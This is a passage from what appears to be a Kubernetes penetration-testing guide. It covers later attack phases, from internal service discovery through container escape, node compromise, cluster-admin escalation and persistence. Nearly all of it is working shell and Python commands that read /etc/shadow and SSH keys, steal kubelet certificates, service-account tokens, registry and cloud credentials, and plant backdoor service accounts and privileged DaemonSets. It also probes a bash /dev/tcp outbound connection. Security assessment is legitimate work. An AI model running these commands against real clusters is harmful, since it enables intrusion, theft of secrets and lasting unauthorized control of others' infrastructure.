env | grep -E "_SERVICE_HOST|_SERVICE_PORT" | sort

# DNS brute-force
for svc in payment-api payments billing auth database redis postgres mysql mongodb \
           api backend internal admin vault consul; do
  ip=$(python3 -c "import socket; print(socket.gethostbyname('$svc'))" 2>/dev/null)
  [ -n "$ip" ] && echo "  βœ… FOUND: $svc β†’ $ip"
done

# With namespace qualifiers
for ns in default kube-system web payments production staging; do
  for svc in api payment db redis; do
    ip=$(python3 -c "import socket; print(socket.gethostbyname('$svc.$ns.svc.cluster.local'))" 2>/dev/null)
    [ -n "$ip" ] && echo "  βœ… FOUND: $svc.$ns β†’ $ip"
  done
done

4.2 Port Scanning Internal Services

# Pure Python β€” no tools required
python3 -c "
import socket
targets = ['payment-api.payments.svc.cluster.local']
ports = [80, 443, 8080, 8443, 3000, 3306, 5432, 6379, 9200, 27017, 9092, 2379]
for host in targets:
    print(f'\n━━━ {host} ━━━')
    for port in ports:
        try:
            s = socket.socket(); s.settimeout(1)
            s.connect((host, port)); print(f'  βœ… OPEN: {port}'); s.close()
        except: pass
"

4.3 Lateral Movement β€” Accessing Internal APIs

πŸ”΄ CRITICAL β€” plain HTTP exposes PII, card data, credentials. If the service returns an endpoint list in its response the tool automatically probes all advertised endpoints recursively β€” e.g. {"endpoints":["/health","/transactions","/customers"]}

python3 -c "
import urllib.request, json

def probe(url, visited=set()):
    if url in visited: return
    visited.add(url)
    try:
        r = urllib.request.urlopen(url, timeout=3)
        body = r.read()[:400].decode(errors='replace')
        print(f'πŸ”΄ REACHABLE [{r.status}]: {url}')
        sensitive = any(kw in body.lower() for kw in
            ['password','secret','token','card','customer','transaction'])
        if sensitive: print(f'   ⚠ Sensitive data in response!')
        print(f'   {body[:150]}')
        # Parse advertised endpoints and recursively probe all of them
        try:
            d = json.loads(body)
            for key in ['endpoints','paths','routes','links']:
                for ep in d.get(key, []):
                    if str(ep).startswith('/'):
                        base = url.split('//')[1].split('/')[0]
                        probe(f'http://{base}{ep}', visited)
        except: pass
    except Exception as e:
        print(f'βœ…  BLOCKED: {url} ({str(e)[:60]})')

# Seed with discovered service roots β€” the tool handles the rest
targets = [
    'http://payment-api.payments:8080/',
    'http://checkout.payments:8080/',
]
for t in targets:
    probe(t)
"

4.4 Istio / Service Mesh Detection

ℹ️ INFO β€” CRD-based detection works even without pod list permission. HTTP 403 = CRD exists = Istio is installed. STRICT mTLS explains why some HTTP probes return PASS despite ports being open at TCP level.

# Check Istio CRDs β€” 200 = can list, 403 = installed but restricted (both = Istio present)
for path in   "apis/networking.istio.io/v1alpha3/peerauthentications"   "apis/security.istio.io/v1/authorizationpolicies"   "apis/networking.istio.io/v1alpha3/virtualservices"; do
  CODE=$(curl -sk -o /dev/null -w "%{http_code}"     -H "Authorization: Bearer $TOKEN" $API/$path)
  [ "$CODE" = "200" ] || [ "$CODE" = "403" ] &&     echo "βœ… Istio CRD present: $path (HTTP $CODE)" ||     echo "❌ Not found: $path"
done

# PeerAuthentication β€” verify STRICT mTLS is enforced per namespace
curl -sk -H "Authorization: Bearer $TOKEN"   $API/apis/security.istio.io/v1/peerauthentications 2>/dev/null |   python3 -c "
import sys, json
d = json.load(sys.stdin)
for p in d.get('items', []):
    mode = p.get('spec',{}).get('mtls',{}).get('mode','?')
    ns   = p['metadata']['namespace']
    name = p['metadata']['name']
    icon = 'βœ…' if mode == 'STRICT' else '🟠'
    print(f'{icon} PeerAuthentication {ns}/{name}: mtls.mode={mode}')
" 2>/dev/null

# AuthorizationPolicy β€” what traffic is allowed/denied
curl -sk -H "Authorization: Bearer $TOKEN"   $API/apis/security.istio.io/v1/authorizationpolicies 2>/dev/null |   python3 -c "
import sys, json
d = json.load(sys.stdin)
policies = d.get('items', [])
print(f'AuthorizationPolicies: {len(policies)}')
for p in policies:
    ns     = p['metadata']['namespace']
    name   = p['metadata']['name']
    action = p.get('spec',{}).get('action','ALLOW')
    print(f'  {ns}/{name} β†’ {action}')
" 2>/dev/null

4.5 Network Traffic Sniffing

πŸ”΄ CRITICAL β€” plaintext PII, credentials, session tokens visible

# Python raw socket (requires NET_RAW)
python3 -c "
import socket
try:
    s = socket.socket(socket.AF_PACKET, socket.SOCK_RAW, socket.htons(0x0800))
    print('πŸ”΄ NET_RAW available β€” traffic sniffing possible')
    s.close()
except PermissionError:
    print('βœ… NET_RAW denied')
" 2>/dev/null

πŸšͺ Phase 5: Container Escape

5.1 nsenter (hostPID + Privileged)

πŸ”΄ CRITICAL β€” full host shell

nsenter -t 1 -m -u -i -n -p -- /bin/bash 2>/dev/null && \
  echo "πŸ”΄ HOST SHELL OBTAINED" || echo "βœ… nsenter failed"

5.2 chroot (hostPath: /)

πŸ”΄ CRITICAL β€” same as being root on the node

for mnt in /host /hostfs /rootfs /mnt/host; do
  if [ -f "$mnt/etc/shadow" ]; then
    echo "πŸ”΄ HOST FILESYSTEM AT: $mnt"
    chroot $mnt /bin/bash -c "whoami && hostname && cat /etc/shadow | head -3"
  fi
done

5.3 Container Runtime Socket

πŸ”΄ CRITICAL β€” create any container, manage all workloads

for sock in /var/run/docker.sock /run/containerd/containerd.sock \
            /host/run/containerd/containerd.sock /run/crio/crio.sock; do
  [ -S "$sock" ] && echo "πŸ”΄ SOCKET EXPOSED: $sock" && ls -la "$sock"
done

# Docker socket escape
docker run -v /:/host --privileged alpine \
  chroot /host whoami 2>/dev/null && echo "πŸ”΄ DOCKER ESCAPE SUCCESSFUL"

5.4 cgroup v1 release_agent

πŸ”΄ CRITICAL β€” write to release_agent = arbitrary code on host

if ls /sys/fs/cgroup/*/release_agent 2>/dev/null | grep -q .; then
  echo "πŸ”΄ CGROUP V1 ESCAPE VECTOR PRESENT"
  cat /sys/fs/cgroup/memory/release_agent 2>/dev/null
else
  echo "βœ… cgroup v1 escape not available"
fi

πŸ–₯️ Phase 6: Node-Level Compromise

6.1 Kubelet Certificate Theft

πŸ”΄ CRITICAL β€” kubelet cert = system:node cluster role

ls -la /host/var/lib/kubelet/pki/ 2>/dev/null

# Attempt API call with kubelet cert
curl -sk \
  --cert /host/var/lib/kubelet/pki/kubelet-client-current.pem \
  --key  /host/var/lib/kubelet/pki/kubelet-client-current.pem \
  https://kubernetes.default/api/v1/nodes 2>/dev/null | \
  python3 -c "import sys,json; items=json.load(sys.stdin).get('items',[]); print(f'πŸ”΄ {len(items)} nodes visible via kubelet cert')" \
  2>/dev/null

6.2 Steal Other Pods' SA Tokens

πŸ”΄ CRITICAL β€” pivot to any service account on the node. Handles both legacy secret-based tokens and modern projected volume tokens (projected tokens use the sub field instead of the kubernetes.io/serviceaccount/ claims).

# Find tokens β€” exclude the dated symlink to avoid duplicates
find /host/var/lib/kubelet/pods -name "token"   -not -path "*..data*" 2>/dev/null | sort -u | while read t; do
  TOKEN_VAL=$(cat "$t" 2>/dev/null)
  [ -z "$TOKEN_VAL" ] && continue

  SA_INFO=$(python3 -c "
import base64, json
token = open('$t').read().strip()
parts = token.split('.')
if len(parts) < 2: exit(1)
payload = json.loads(base64.urlsafe_b64decode(parts[1] + '=='))
# Standard secret-based token claims
sa = payload.get('kubernetes.io/serviceaccount/service-account.name','')
ns = payload.get('kubernetes.io/serviceaccount/namespace','')
# Projected volume tokens use sub field: system:serviceaccount:<ns>:<sa>
if not sa or not ns:
    sub = payload.get('sub','')
    if sub.startswith('system:serviceaccount:'):
        p = sub.split(':')
        ns, sa = p[2], p[3]
print(f'{ns}/{sa}')
" 2>/dev/null)

  echo "  πŸ”‘ $SA_INFO β€” $t"

  # Test permissions of every stolen token β€” not just the first few
  for path in "/api/v1/secrets" "/api/v1/nodes"               "/api/v1/namespaces"               "/apis/rbac.authorization.k8s.io/v1/clusterrolebindings"; do
    CODE=$(curl -sk -o /dev/null -w "%{http_code}"       -H "Authorization: Bearer $TOKEN_VAL"       https://${KUBERNETES_SERVICE_HOST}:${KUBERNETES_SERVICE_PORT}$path)
    [ "$CODE" = "200" ] && echo "    πŸ”΄ ALLOWED: $path"
  done
done

6.3 Sensitive Host Files

for f in \
  /host/etc/kubernetes/admin.conf \
  /host/etc/kubernetes/kubelet.conf \
  /host/var/lib/kubelet/kubeconfig \
  /host/home/kubernetes/kube-env \
  /host/etc/kubernetes/pki/ca.key; do
  [ -f "$f" ] && echo "πŸ”΄ FOUND: $f" && head -3 "$f"
done

# SSH keys
find /host/root /host/home -name "id_rsa" -o -name "id_ed25519" 2>/dev/null | \
  while read k; do echo "πŸ”΄ SSH KEY: $k"; head -1 "$k"; done

⬆️ Phase 7: Cluster-Wide Privilege Escalation

7.1 ClusterRoleBinding Escalation

πŸ”΄ CRITICAL β€” grants permanent cluster-admin

RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
  -d "{
    \"apiVersion\":\"rbac.authorization.k8s.io/v1\",
    \"kind\":\"ClusterRoleBinding\",
    \"metadata\":{\"name\":\"assessment-escalation\"},
    \"roleRef\":{\"apiGroup\":\"rbac.authorization.k8s.io\",\"kind\":\"ClusterRole\",\"name\":\"cluster-admin\"},
    \"subjects\":[{\"kind\":\"ServiceAccount\",\"name\":\"default\",\"namespace\":\"$NS\"}]
  }")
echo "ClusterRoleBinding: $([ "$RESULT" = "201" ] && echo "πŸ”΄ ESCALATION SUCCESSFUL" || echo "βœ… DENIED ($RESULT)")"

7.2 Admission Webhook Analysis

πŸ”΄ CRITICAL β€” failurePolicy=Ignore + unreachable service = all policies silently bypassed

curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/apis/admissionregistration.k8s.io/v1/validatingwebhookconfigurations | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for wh in d.get('items', []):
    name = wh['metadata']['name']
    for w in wh.get('webhooks', []):
        fp = w.get('failurePolicy', '?')
        icon = 'πŸ”΄' if fp == 'Ignore' else 'βœ…'
        print(f'{icon} {name} β€” failurePolicy: {fp}')
        if fp == 'Ignore':
            print(f'   ⚠️  BYPASS: webhook outage = all policies silently disabled')
"

7.3 etcd Direct Access

πŸ”΄ CRITICAL β€” all secrets in plaintext if encryption-at-rest disabled

# Self-managed / control-plane accessible clusters
ETCDCTL_API=3 etcdctl \
  --endpoints=https://127.0.0.1:2379 \
  --cacert=/etc/kubernetes/pki/etcd/ca.crt \
  --cert=/etc/kubernetes/pki/etcd/peer.crt \
  --key=/etc/kubernetes/pki/etcd/peer.key \
  get /registry/secrets --prefix --keys-only 2>/dev/null | head -20

πŸ”’ Phase 8: Persistence Techniques

8.1 Backdoor Service Account

πŸ”΄ CRITICAL β€” persists after pod termination, survives cluster upgrades

# Create backdoor SA in kube-system
curl -sk -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/api/v1/namespaces/kube-system/serviceaccounts \
  -d '{"apiVersion":"v1","kind":"ServiceAccount","metadata":{"name":"assessment-backdoor"}}' | python3 -m json.tool

# Bind cluster-admin to it
RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/apis/rbac.authorization.k8s.io/v1/clusterrolebindings \
  -d '{
    "apiVersion":"rbac.authorization.k8s.io/v1","kind":"ClusterRoleBinding",
    "metadata":{"name":"assessment-backdoor-binding"},
    "roleRef":{"apiGroup":"rbac.authorization.k8s.io","kind":"ClusterRole","name":"cluster-admin"},
    "subjects":[{"kind":"ServiceAccount","name":"assessment-backdoor","namespace":"kube-system"}]
  }')
echo "Backdoor: $([ "$RESULT" = "201" ] && echo "πŸ”΄ CREATED β€” cluster-admin persists" || echo "βœ… DENIED")"

8.2 Malicious DaemonSet (Every Node)

πŸ”΄ CRITICAL β€” proves code runs on every node simultaneously

RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/json" -X POST \
  $API/apis/apps/v1/namespaces/kube-system/daemonsets \
  -d '{
    "apiVersion":"apps/v1","kind":"DaemonSet",
    "metadata":{"name":"assessment-daemonset"},
    "spec":{
      "selector":{"matchLabels":{"app":"assessment"}},
      "template":{"metadata":{"labels":{"app":"assessment"}},
        "spec":{"hostPID":true,"hostNetwork":true,"tolerations":[{"operator":"Exists"}],
          "containers":[{"name":"probe","image":"alpine","command":["sleep","3600"],
            "securityContext":{"privileged":true}}]}}}}')
echo "DaemonSet: $([ "$RESULT" = "201" ] && echo "πŸ”΄ CREATED β€” runs on ALL nodes" || echo "βœ… DENIED")"

πŸ“¦ Phase 9: Supply Chain & Admission Control

9.1 Image Signing Check

# Method 1: Admission webhook list
curl -sk -H "Authorization: Bearer $TOKEN"   $API/apis/admissionregistration.k8s.io/v1/validatingwebhookconfigurations |   python3 -c "
import sys, json
d = json.load(sys.stdin)
names = [wh['metadata']['name'] for wh in d.get('items',[])]
signing_tools = ['kyverno','cosign','sigstore','notary','connaisseur']
found = [n for n in names if any(t in n.lower() for t in signing_tools)]
print(f'βœ… Image signing webhooks: {found}' if found else '⚠ No image signing webhook found via list')
" 2>/dev/null

# Method 2: Kyverno CRD fallback β€” works when webhook list returns 401/403
# HTTP 403 means Kyverno is installed but SA cannot list policies β€” still a PASS
for api_path in   "apis/kyverno.io/v1/clusterpolicies"   "apis/kyverno.io/v2beta1/clusterpolicies"; do
  CODE=$(curl -sk -o /dev/null -w "%{http_code}"     -H "Authorization: Bearer $TOKEN" $API/$api_path)
  if [ "$CODE" = "200" ]; then
    curl -sk -H "Authorization: Bearer $TOKEN" $API/$api_path |       python3 -c "
import sys, json
d = json.load(sys.stdin)
policies = d.get('items', [])
verify = [p['metadata']['name'] for p in policies
          if 'verifyimage' in str(p.get('spec',{})).lower()]
print(f'βœ… Kyverno installed: {len(policies)} policies')
if verify: print(f'βœ… verifyImages policies: {verify}')
"
    break
  elif [ "$CODE" = "403" ]; then
    echo "βœ… Kyverno installed β€” ClusterPolicies not readable (HTTP 403 = CRD exists)"
    break
  fi
done

9.2 Registry Credential Theft & Pivot

🟠 HIGH β€” pull any private image, push backdoored images. After finding credentials, the tool probes the registry catalog API to prove actual pull access and enumerate all available repositories.

# Find and decode registry secrets
curl -sk -H "Authorization: Bearer $TOKEN"   $API/api/v1/namespaces/$NS/secrets |   python3 -c "
import sys, json, base64, urllib.request, ssl

d = json.load(sys.stdin)
for s in d.get('items', []):
    if s.get('type') != 'kubernetes.io/dockerconfigjson': continue
    cfg_b64 = s.get('data',{}).get('.dockerconfigjson','')
    if not cfg_b64: continue
    cfg = json.loads(base64.b64decode(cfg_b64))
    for registry, creds in cfg.get('auths',{}).items():
        # Decode credentials β€” may be in auth field or username/password
        auth_raw = creds.get('auth','')
        if auth_raw:
            decoded  = base64.b64decode(auth_raw).decode()
            user, _, password = decoded.partition(':')
        else:
            user     = creds.get('username','')
            password = creds.get('password','')
        print(f'πŸ”΄ Registry secret: {s["metadata"]["name"]}')
        print(f'   Registry: {registry} | User: {user}')

        # Pivot β€” probe catalog endpoint to prove pull access
        base = registry if registry.startswith('http') else f'https://{registry}'
        auth_header = base64.b64encode(f'{user}:{password}'.encode()).decode()
        ctx = ssl.create_default_context()
        ctx.check_hostname = False; ctx.verify_mode = ssl.CERT_NONE
        for ep in ['/v2/_catalog', '/api/v2.0/repositories?page_size=20']:
            try:
                req = urllib.request.Request(f'{base}{ep}',
                    headers={'Authorization': f'Basic {auth_header}'})
                r = urllib.request.urlopen(req, context=ctx, timeout=5)
                body = r.read().decode()
                print(f'   πŸ”΄ CATALOG ACCESSIBLE: {ep}')
                print(f'   {body[:200]}')
                break
            except Exception as e:
                print(f'   {ep}: {str(e)[:60]}')
"

🟑 Phase 10: EKS-Specific Tests

10.1 aws-auth ConfigMap β€” Read & Write

πŸ”΄ CRITICAL if writable β€” add any IAM role as cluster-admin permanently

# Read aws-auth
curl -sk -H "Authorization: Bearer $TOKEN" \
  $API/api/v1/namespaces/kube-system/configmaps/aws-auth | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
data = d.get('data', {})
print('mapRoles:')
print(data.get('mapRoles','  (empty)'))
print('mapUsers:')
print(data.get('mapUsers','  (empty)'))
"

# Test write
RESULT=$(curl -sk -o /dev/null -w "%{http_code}" \
  -H "Authorization: Bearer $TOKEN" \
  -H "Content-Type: application/strategic-merge-patch+json" -X PATCH \
  $API/api/v1/namespaces/kube-system/configmaps/aws-auth -d '{}')
echo "aws-auth write: $([ "$RESULT" = "200" ] && echo "πŸ”΄ WRITABLE β€” can backdoor IAM role as cluster-admin" || echo "βœ… DENIED")"

10.2 IRSA Token Abuse

πŸ”΄ CRITICAL β€” pod-level AWS API access

# Check for IRSA
echo "AWS_WEB_IDENTITY_TOKEN_FILE: $AWS_WEB_IDENTITY_TOKEN_FILE"
echo "AWS_ROLE_ARN: $AWS_ROLE_ARN"

if [ -n "$AWS_ROLE_ARN" ]; then
  echo "πŸ”΄ IRSA present β€” assuming role: $AWS_ROLE_ARN"
  aws sts assume-role-with-web-identity \
    --role-arn "$AWS_ROLE_ARN" \
    --role-session-name assessment \
    --web-identity-token "$(cat $AWS_WEB_IDENTITY_TOKEN_FILE)" 2>/dev/null | python3 -m json.tool
fi

10.3 EKS Node IAM Role (Attacker Machine)

aws iam list-attached-role-policies --role-name eks-node-group-role
aws iam simulate-principal-policy \
  --policy-source-arn arn:aws:iam::ACCOUNT:role/eks-node-group-role \
  --action-names "s3:GetObject" "secretsmanager:GetSecretValue" "sts:AssumeRole"

# Check audit logs
aws logs filter-log-events \
  --log-group-name /aws/eks/<cluster>/cluster \
  --filter-pattern '"system:anonymous"' \
  --start-time $(date -d '1 hour ago' +%s000)

πŸ”΅ Phase 11: GKE-Specific Tests

11.1 Node SA Scopes

πŸ”΄ CRITICAL if cloud-platform scope

SCOPES=$(curl -s -H "Metadata-Flavor: Google" \
  "http://metadata.google.internal/computeMetadata/v1/instance/service-accounts/default/scopes" 2>/dev/null)

echo "$SCOPES" | tr ',' '\n' | while read scope; do
  case "$scope" in
    *cloud-platform*)   echo "  πŸ”΄ cloud-platform β€” FULL GCP ACCESS";;
    *devstorage*)       echo "  🟠 devstorage β€” GCS bucket access";;
    *compute*)          echo "  🟠 compute β€” VM/network access";;
    *)                  echo "  πŸ”΅ $scope";;
  esac
done

11.2 Legacy GKE Metadata

πŸ”΄ CRITICAL β€” old clusters, no header required

curl -s --max-time 5 \
  "http://metadata.google.internal/computeMetadata/v1beta1/instance/service-accounts/default/token" \
  2>/dev/null && echo "πŸ”΄ LEGACY METADATA ACCESSIBLE WITHOUT HEADER" || \
  echo "βœ… Legacy endpoint blocked"

⚑ Phase 12: Runtime Security Gaps

12.1 Detect Runtime Security Tools

# Method 1: Pod names in kube-system (requires pod list permission)
curl -sk -H "Authorization: Bearer $TOKEN"   $API/api/v1/namespaces/kube-system/pods |   python3 -c "
import sys, json
d = json.load(sys.stdin)
tools = {'tetragon':'🟒 Tetragon eBPF enforcement','falco':'🟑 Falco (alerts only)',
         'sysdig':'🟑 Sysdig','aqua':'🟑 Aqua Security','datadog':'πŸ”΅ Datadog'}
found = set()
for p in d.get('items', []):
    name = p['metadata']['name'].lower()
    for tool, msg in tools.items():
        if tool in name and tool not in found:
            print(msg); found.add(tool)
if not found:
    print('  No runtime tools found via pod names')
" 2>/dev/null

# Method 2: CRD-based detection β€” works even when pod list returns 401/403
# HTTP 403 = CRD exists but SA cannot list = tool is installed
for crd_path in   "apis/cilium.io/v1alpha1/tracingpolicies:Tetragon"   "apis/falco.org/v1alpha1/falcoconfigs:Falco"   "apis/kyverno.io/v1/clusterpolicies:Kyverno"   "apis/networking.istio.io/v1alpha3/peerauthentications:Istio"   "apis/security.istio.io/v1/authorizationpolicies:Istio"; do
  path="${crd_path%%:*}"; tool="${crd_path##*:}"
  CODE=$(curl -sk -o /dev/null -w "%{http_code}"     -H "Authorization: Bearer $TOKEN" $API/$path)
  [ "$CODE" = "200" ] && echo "βœ… $tool detected (HTTP 200 β€” can list)"
  [ "$CODE" = "403" ] && echo "βœ… $tool detected (HTTP 403 β€” CRD exists, restricted)"
  [ "$CODE" = "404" ] && echo "❌ $tool not found (HTTP 404)"
done

# Method 3: Filesystem markers (works even without API access)
for path in "/etc/tetragon" "/etc/falco/falco.yaml" "/etc/falco"; do
  [ -e "$path" ] && echo "βœ… Found on filesystem: $path"
done

# Tetragon TracingPolicies β€” enumerate active enforcement rules
kubectl get tracingpolicies 2>/dev/null ||   curl -sk -H "Authorization: Bearer $TOKEN"     $API/apis/cilium.io/v1alpha1/tracingpolicies |     python3 -c "
import sys, json
try:
    d = json.load(sys.stdin)
    policies = d.get('items', [])
    if policies:
        print(f'βœ… TracingPolicies active: {len(policies)}')
        for p in policies: print(f'   β€’ {p["metadata"]["name"]}')
    else:
        print('🟠 Tetragon installed but NO TracingPolicies active β€” observing only')
except: pass
" 2>/dev/null

12.2 Probe Tetragon Enforcement

# Exec from /tmp (block-exec-from-tmp policy)
cp /bin/ls /tmp/assessment-test 2>/dev/null
RESULT=$(timeout 3 /tmp/assessment-test / 2>&1)
rm /tmp/assessment-test 2>/dev/null
echo "Exec from /tmp: $(echo "$RESULT" | grep -q "Killed" && echo "βœ… BLOCKED" || echo "πŸ”΄ ALLOWED")"

# bash outbound TCP (block-reverse-shell policy)
RESULT=$(timeout 3 bash -c "exec 3<>/dev/tcp/8.8.8.8/53 && echo OPEN" 2>&1)
echo "bash /dev/tcp:  $(echo "$RESULT" | grep -q "Killed" && echo "βœ… BLOCKED" || echo "πŸ”΄ ALLOWED")"

πŸ” Phase 13: Secrets & Sensitive Data

13.1 Environment Variable Secrets

env | grep -iE "password|passwd|secret|key|token|api|credential|auth|private|cert|pwd" | \
  grep -vE "KUBERNETES|SERVICE_|_PORT|_HOST|PATH|HOME|SHELL|TERM" | \
  while IFS='=' read -r name value; do
    echo "  πŸ”‘ $name = ${value:0:80}"
  done

13.2 Mounted Secret Files & App Configs

# Known credential file paths
for path in "/root/.docker/config.json" "/root/.aws/credentials" \
            "/root/.kube/config" "/etc/kubernetes/azure.json"; do
  [ -f "$path" ] && echo "  πŸ”‘ FOUND: $path" && head -3 "$path"
done

# App config credential grep
find /app /config /etc/app /srv /opt 2>/dev/null -type f \
  \( -name "*.yaml" -o -name "*.json" -o -name "*.env" -o -name "*.conf" \) | \
  xargs grep -l -iE "password|secret|api_key|private_key" 2>/dev/null | \
  while read f; do
    echo "  πŸ”΄ Credentials in: $f"
    grep -iE "password\s*[:=]\s*\S+|secret\s*[:=]\s*\S+" "$f" 2>/dev/null | head -3 | sed 's/^/     /'
  done

πŸ’₯ Phase 14: DoS & Resource Exhaustion

# Memory limit β€” check both cgroup v1 (most clusters) and cgroup v2 (EKS AL2023+)
echo "=== Memory Limit ==="
for path in   "/sys/fs/cgroup/memory/memory.limit_in_bytes"   "/sys/fs/cgroup/memory.max"; do
  [ -f "$path" ] || continue
  val=$(cat "$path" 2>/dev/null)
  if [ "$val" = "9223372036854771712" ] || [ "$val" = "max" ]; then
    echo "πŸ”΄ NO MEMORY LIMIT ($path = $val) β€” pod can OOM the node"
  else
    mb=$(python3 -c "print(f'{int("$val")//1024//1024} MB')" 2>/dev/null)
    echo "βœ… Memory limit: $mb ($path)"
  fi
done

# cgroup v2 unified hierarchy fallback (EKS Amazon Linux 2023)
if [ ! -f "/sys/fs/cgroup/memory/memory.limit_in_bytes" ] &&    [ ! -f "/sys/fs/cgroup/memory.max" ]; then
  cg=$(cat /proc/self/cgroup | head -1 | cut -d: -f3)
  val=$(cat /sys/fs/cgroup${cg}/memory.max 2>/dev/null)
  [ "$val" = "max" ] && echo "πŸ”΄ NO MEMORY LIMIT (cgroup v2)" ||     echo "βœ… Memory (cgroup v2): $val"
fi

# CPU quota β€” check both cgroup v1 and v2
echo "=== CPU Limit ==="
cpu_v1=$(cat /sys/fs/cgroup/cpu/cpu.cfs_quota_us 2>/dev/null)
cpu_v2=$(cat /sys/fs/cgroup/cpu.max 2>/dev/null | awk '{print $1}')
val="${cpu_v1:-$cpu_v2}"
[ "$val" = "-1" ] || [ "$val" = "max" ] &&   echo "πŸ”΄ NO CPU LIMIT β€” pod can starve other workloads of CPU" ||   echo "βœ… CPU limit: ${val}us/period"

# ResourceQuota
curl -sk -H "Authorization: Bearer $TOKEN"   $API/api/v1/namespaces/$NS/resourcequotas |   python3 -c "
import sys, json
d = json.load(sys.stdin)
items = d.get('items', [])
print('🟑 No ResourceQuota' if not items else f'βœ… {len(items)} quota(s) active')
"

# Audit logging detection β€” self-managed or EKS CloudWatch
echo "=== Audit Logging ==="

# Self-managed: check kube-apiserver pod flags
kubectl -n kube-system get pod -l component=kube-apiserver   -o jsonpath='{.items[0].spec.containers[0].command}' 2>/dev/null |   python3 -c "
import sys, json
cmd = ' '.join(json.load(sys.stdin))
print('βœ… Audit enabled (--audit-log-path)' if '--audit-log-path' in cmd else 'πŸ”΄ No --audit-log-path flag')
print('βœ… Audit policy set'                if '--audit-policy-file' in cmd else '🟠 No --audit-policy-file flag')
" 2>/dev/null

# EKS: verify CloudWatch log groups
aws logs describe-log-groups   --log-group-name-prefix /aws/eks   --region ${AWS_DEFAULT_REGION:-ap-south-1}   --query 'logGroups[*].logGroupName'   --output text 2>/dev/null &&   echo "βœ… EKS audit logs present in CloudWatch" ||   echo "🟠 No EKS audit log groups β€” may not be enabled"

πŸ”­ Phase 15: Cluster Intelligence & CVE Detection ⭐

15.1 Kubernetes Version & CVE Mapping

# Fingerprint K8s version
curl -sk -H "Authorization: Bearer $TOKEN" $API/version | python3 -m json.tool

# The tool performs REAL version comparison β€” no blanket firing
# CVE-2018-1002105 only fires on K8s minor < 13 (fixed in 1.10.11/1.11.5/1.12.3)
# CVE-2024-21626 checks containerd version: >= 1.7.0 bundles runc >= 1.1.12 (patched)
# Kernel CVEs check actual kernel version range β€” kernel 6.12 correctly shows PASS

15.2 API Server Public Exposure

πŸ”΄ CRITICAL β€” Kubernetes API server accessible from the internet means anyone can attempt brute-force authentication or exploit unpatched API server CVEs remotely.

# Resolve the API server IP and check if it is public or private
API_IP=$(python3 -c "
import socket, os
host = os.environ.get('KUBERNETES_SERVICE_HOST','kubernetes.default.svc')
try:    print(socket.gethostbyname(host))
except: print(host)
" 2>/dev/null)

python3 -c "
ip = '$API_IP'
try:
    parts = list(map(int, ip.split('.')))
    private = (
        parts[0] == 10 or
        parts[0] == 127 or
        (parts[0] == 172 and 16 <= parts[1] <= 31) or
        (parts[0] == 192 and parts[1] == 168) or
        (parts[0] == 169 and parts[1] == 254) or
        (parts[0] == 100 and 64 <= parts[1] <= 127)
    )
    if private:
        print(f'βœ… API server on private IP: {ip}')
    else:
        print(f'πŸ”΄ API server on PUBLIC IP: {ip} β€” internet-exposed!')
        print('   Fix: aws eks update-cluster-config --resources-vpc-config endpointPublicAccess=false')
except Exception as e:
    print(f'Could not determine: {e}')
"

15.3 Worker Node Public IP Check

🟠 HIGH β€” public node IPs expose kubelet (10250), NodePort services, and runtime sockets directly to the internet.

kubectl get nodes -o json 2>/dev/null | python3 -c "
import sys, json
d = json.load(sys.stdin)
for node in d.get('items', []):
    name = node['metadata']['name']
    for addr in node.get('status',{}).get('addresses',[]):
        ip = addr['address']
        if '.' not in ip: continue
        try:
            parts = list(map(int, ip.split('.')))
            private = (
                parts[0] == 10 or
                parts[0] == 127 or
                (parts[0] == 172 and 16 <= parts[1] <= 31) or
                (parts[0] == 192 and parts[1] == 168)
            )
            icon  = 'βœ…' if private else 'πŸ”΄'
            label = 'private' if private else 'PUBLIC!'
            print(f'{icon} {name}: {ip} ({addr["type"]}) β€” {label}')
        except: pass
"

15.4 Cluster-Wide Privileged Pod Audit

# Find all privileged/over-permissioned pods across every namespace
curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/pods | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
for pod in d.get('items', []):
    spec = pod.get('spec', {})
    meta = pod.get('metadata', {})
    issues = []
    if spec.get('hostPID'):    issues.append('hostPID')
    if spec.get('hostNetwork'): issues.append('hostNetwork')
    for c in spec.get('containers', []):
        sc = c.get('securityContext', {})
        if sc.get('privileged'):           issues.append(f'privileged({c[\"name\"]})')
        if sc.get('runAsUser') == 0:       issues.append(f'runAsRoot({c[\"name\"]})')
    if issues:
        print(f'πŸ”΄ {meta[\"namespace\"]}/{meta[\"name\"]}: {issues}')
"

🎯 Phase 16: Kubelet Exploitation ⭐

16.1 Anonymous Kubelet Access

πŸ”΄ CRITICAL β€” full pod list, env vars, exec capability without credentials

# Port 10255 β€” read-only, no auth
for NODE_IP in $(curl -sk -H "Authorization: Bearer $TOKEN" $API/api/v1/nodes | \
  python3 -c "import sys,json; [print(a['address']) for n in json.load(sys.stdin).get('items',[]) for a in n.get('status',{}).get('addresses',[]) if a['type']=='InternalIP']" 2>/dev/null); do

  echo "━━━ Kubelet @ $NODE_IP ━━━"
  curl -s --max-time 5 http://$NODE_IP:10255/pods 2>/dev/null | \
    python3 -c "import sys,json; d=json.load(sys.stdin); print(f'πŸ”΄ 10255 ANONYMOUS β€” {len(d.get(\"items\",[]))} pods')" \
    2>/dev/null || echo "βœ… 10255 not accessible"

  curl -sk --max-time 5 https://$NODE_IP:10250/pods 2>/dev/null | head -1 | \
    grep -q "items" && echo "πŸ”΄ 10250 ANONYMOUS ACCESS" || echo "βœ… 10250 requires auth"
done

16.2 Harvest Credentials from Kubelet /pods

# Extract all env var credentials from every pod on the node
curl -s http://$NODE_IP:10255/pods 2>/dev/null | \
  python3 -c "
import sys, json
d = json.load(sys.stdin)
cred_kw = ['password','secret','token','api_key','credential']
for pod in d.get('items', [])[:20]:
    for c in pod.get('spec', {}).get('containers', []):
        for env in c.get('env', []):
